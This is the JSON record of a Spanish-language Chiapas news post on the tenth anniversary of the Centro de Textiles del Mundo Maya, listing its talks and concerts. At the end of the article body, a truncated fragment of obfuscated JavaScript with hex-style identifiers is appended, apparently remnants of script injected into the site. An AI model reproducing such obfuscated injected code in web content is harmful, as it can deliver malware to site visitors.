{"id":6057,"date":"2022-10-22T01:40:36","date_gmt":"2022-10-22T01:40:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6057"},"modified":"2022-10-22T01:40:37","modified_gmt":"2022-10-22T01:40:37","slug":"cumple-10-anos-de-vida-centro-de-textiles-del-mundo-maya","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6057","title":{"rendered":"Cumple 10 a\u00f1os de vida Centro de Textiles del Mundo Maya"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM-1024x498.jpeg\" alt=\"\" class=\"wp-image-6058\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM-1024x498.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM-300x146.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM-768x373.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM-1536x746.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-21-at-3.44.44-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Centro de Textiles del Mundo Maya dio a conocer que se encuentran celebrando los 10 a\u00f1os de su fundaci\u00f3n que se dio al interior del Centro Cultural de Los Altos de Chiapas, Ex convento de Santo Domingo de Guzm\u00e1n.En un comunicado, dan a conocer que tendr\u00e1n diversas actividades la charla \u201cEl nacimiento de CTMM\u201d, con C\u00e1ndida Fern\u00e1ndez, Pedro Meza, Aurora Pellizzi, Pablo Ram\u00edrez y Gabi Stromberg.Asimismo, tuvo lugar el concierto de m\u00fasica mexicana, con el grupo marimb\u00edstico de Carlos Tejada, director Hilario Cigarros y para el d\u00eda s\u00e1bado 29 de octubre, el concierto de m\u00fasica cl\u00e1sica y mexicana, con los concertistas de Bellas Artes, Lourdes Ambriz, soprano, y Alberto Cruzprieto, en el piano.&#8221;El Centro de Textiles del Mundo Maya se ha situado como uno de los mejores museos textiles del mundo, pues cuenta con el mejor equipamiento y las m\u00e1s innovadoras herramientas tecnol\u00f3gicas, pedag\u00f3gicas y museogr\u00e1ficas&#8221;.Por \u00faltimo, informan que a la fecha ha creado importantes v\u00ednculos con las comunidades de Los Altos de Chiapas y las creadoras de esta tradici\u00f3n milenaria a trav\u00e9s de proyectos productivos, culturales y acad\u00e9micos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Centro de Textiles del Mundo Maya dio a conocer que se encuentran celebrando los 10 a\u00f1os de su fundaci\u00f3n que se dio al interior del Centro Cultural de Los Altos de Chiapas, Ex convento de Santo Domingo de Guzm\u00e1n.En un comunicado, dan a conocer que tendr\u00e1n diversas actividades &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6058,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6057","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6057"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6057\/revisions"}],"predecessor-version":[{"id":6059,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6057\/revisions\/6059"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6058"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}